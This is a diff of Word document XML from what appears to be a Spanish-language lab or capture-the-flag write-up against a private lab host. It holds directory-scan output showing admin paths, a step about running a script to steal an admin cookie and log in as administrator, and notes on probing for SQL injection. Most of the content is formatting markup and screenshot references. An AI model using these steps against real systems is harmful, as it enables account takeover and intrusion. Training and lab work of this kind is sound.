+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="199A4EF3"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="FABEE230"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:num w:numId="1" w16cid:durableId="1974822309">
+    <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="2" w16cid:durableId="1778023295">
+    <w:abstractNumId w:val="0"/>
+  </w:num>
+</w:numbering>
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
@@ -452,10 +6417,31 @@
     <w:name w:val="Normal"/>
     <w:qFormat/>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="Ttulo3">
+    <w:name w:val="heading 3"/>
+    <w:basedOn w:val="Normal"/>
+    <w:link w:val="Ttulo3Car"/>
+    <w:uiPriority w:val="9"/>
+    <w:qFormat/>
+    <w:rsid w:val="004E3BFC"/>
+    <w:pPr>
+      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+      <w:outlineLvl w:val="2"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:b/>
+      <w:bCs/>
+      <w:kern w:val="0"/>
+      <w:sz w:val="27"/>
+      <w:szCs w:val="27"/>
+      <w:lang w:eastAsia="es-ES"/>
+      <w14:ligatures w14:val="none"/>
+    </w:rPr>
+  </w:style>
   <w:style w:type="character" w:default="1" w:styleId="Fuentedeprrafopredeter">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="Tablanormal">
@@ -478,6 +6464,106 @@
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo3Car">
+    <w:name w:val="Título 3 Car"/>
+    <w:basedOn w:val="Fuentedeprrafopredeter"/>
+    <w:link w:val="Ttulo3"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="004E3BFC"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:b/>
+      <w:bCs/>
+      <w:kern w:val="0"/>
+      <w:sz w:val="27"/>
+      <w:szCs w:val="27"/>
+      <w:lang w:eastAsia="es-ES"/>
+      <w14:ligatures w14:val="none"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="Textoennegrita">
+    <w:name w:val="Strong"/>
+    <w:basedOn w:val="Fuentedeprrafopredeter"/>
+    <w:uiPriority w:val="22"/>
+    <w:qFormat/>
+    <w:rsid w:val="004E3BFC"/>
+    <w:rPr>
+      <w:b/>
+      <w:bCs/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="CdigoHTML">
+    <w:name w:val="HTML Code"/>
+    <w:basedOn w:val="Fuentedeprrafopredeter"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="004E3BFC"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="HTMLconformatoprevio">
+    <w:name w:val="HTML Preformatted"/>
+    <w:basedOn w:val="Normal"/>
+    <w:link w:val="HTMLconformatoprevioCar"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00F91DEA"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="left" w:pos="916"/>
+        <w:tab w:val="left" w:pos="1832"/>
+        <w:tab w:val="left" w:pos="2748"/>
+        <w:tab w:val="left" w:pos="3664"/>
+        <w:tab w:val="left" w:pos="4580"/>
+        <w:tab w:val="left" w:pos="5496"/>
+        <w:tab w:val="left" w:pos="6412"/>
+        <w:tab w:val="left" w:pos="7328"/>
+        <w:tab w:val="left" w:pos="8244"/>
+        <w:tab w:val="left" w:pos="9160"/>
+        <w:tab w:val="left" w:pos="10076"/>
+        <w:tab w:val="left" w:pos="10992"/>
+        <w:tab w:val="left" w:pos="11908"/>
+        <w:tab w:val="left" w:pos="12824"/>
+        <w:tab w:val="left" w:pos="13740"/>
+        <w:tab w:val="left" w:pos="14656"/>
+      </w:tabs>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+      <w:kern w:val="0"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+      <w:lang w:eastAsia="es-ES"/>
+      <w14:ligatures w14:val="none"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="HTMLconformatoprevioCar">
+    <w:name w:val="HTML con formato previo Car"/>
+    <w:basedOn w:val="Fuentedeprrafopredeter"/>
+    <w:link w:val="HTMLconformatoprevio"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:rsid w:val="00F91DEA"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+      <w:kern w:val="0"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+      <w:lang w:eastAsia="es-ES"/>
+      <w14:ligatures w14:val="none"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="token">
+    <w:name w:val="token"/>
+    <w:basedOn w:val="Fuentedeprrafopredeter"/>
+    <w:rsid w:val="00F91DEA"/>
   </w:style>
 </w:styles>
 </file>

--- a/GENERAL_TEAM_CHALLENGES/RETO_8/fingerprint.docx
+++ b/GENERAL_TEAM_CHALLENGES/RETO_8/fingerprint.docx
@@ -3,6 +3,9 @@
 <w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16du wp14">
   <w:body>
     <w:p>
+      <w:r>
+        <w:t>&lt;</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -129,6 +132,47 @@
         </w:drawing>
       </w:r>
     </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09AE3262" wp14:editId="7ACF8DD3">
+            <wp:extent cx="4382112" cy="6992326"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1161700635" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1161700635" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId8"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4382112" cy="6992326"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:rPr>
@@ -211,6 +255,7 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>WORDLIST_FILES: /</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -571,46 +616,46 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
+        <w:t xml:space="preserve">+ http://10.0.2.20/admin/login (CODE:200|SIZE:1387)                                                             </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+ http://10.0.2.20/admin/logout (CODE:302|SIZE:0)                                                               </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+ http://10.0.2.20/admin/new (CODE:302|SIZE:0)                                                                  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">+ http://10.0.2.20/admin/login (CODE:200|SIZE:1387)                                                             </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">+ http://10.0.2.20/admin/logout (CODE:302|SIZE:0)                                                               </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">+ http://10.0.2.20/admin/new (CODE:302|SIZE:0)                                                                  </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:t xml:space="preserve">==&gt; DIRECTORY: http://10.0.2.20/admin/uploads/                                                                  </w:t>
       </w:r>
     </w:p>
@@ -836,37 +881,101 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+      <w:r>
         <w:t>-----------------</w:t>
       </w:r>
     </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B789A03" wp14:editId="4CB91E69">
+            <wp:extent cx="4496427" cy="5801535"/>
+            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
+            <wp:docPr id="1264516268" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1264516268" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId9"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4496427" cy="5801535"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">1.- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t xml:space="preserve">Ejecuto </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>pscript</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t xml:space="preserve"> para </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>sacr</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t xml:space="preserve"> cookie admin y entrar de administrador</w:t>
       </w:r>
     </w:p>
@@ -876,6 +985,9 @@
     <w:p/>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B05A990" wp14:editId="511FA2B2">
@@ -893,7 +1005,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId8"/>
+                    <a:blip r:embed="rId10"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -916,6 +1028,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="759C1CEC" wp14:editId="61B61819">
             <wp:extent cx="5400040" cy="1640205"/>
@@ -932,7 +1047,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId9"/>
+                    <a:blip r:embed="rId11"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -965,6 +1080,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E6AE68F" wp14:editId="5D584234">
             <wp:extent cx="5400040" cy="2962275"/>
@@ -981,7 +1099,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId10"/>
+                    <a:blip r:embed="rId12"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1063,7 +1181,67 @@
         <w:t>el sistema no está manejando adecuadamente la entrada del usuario y es probable que sea vulnerable a inyección SQL</w:t>
       </w:r>
     </w:p>
-    <w:p/>
+    <w:p>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E84988D" wp14:editId="32677E6A">
+            <wp:extent cx="5400040" cy="7310755"/>
+            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
+            <wp:docPr id="102458317" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="102458317" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="7310755"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Parece que el parámetro id está siendo sanitizado en el </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>backend</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>, posiblemente utilizando una conversión a entero (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>intval</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>), lo que hace que las inyecciones SQL convencionales no funcionen. Vamos a intentar algunos enfoques alternativos para verificar y explotar la vulnerabilidad.</w:t>
+      </w:r>
+    </w:p>
     <w:p/>
     <w:p>
       <w:pPr>
@@ -1406,6 +1584,233 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> PHP en el servidor.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="346E69D6" wp14:editId="0ADEFD2E">
+            <wp:extent cx="4867954" cy="8745170"/>
+            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
+            <wp:docPr id="2116398071" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="2116398071" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4867954" cy="8745170"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35C6E127" wp14:editId="29B858FB">
+            <wp:extent cx="4592955" cy="8892540"/>
+            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
+            <wp:docPr id="404257745" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="404257745" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId15"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4592955" cy="8892540"/>
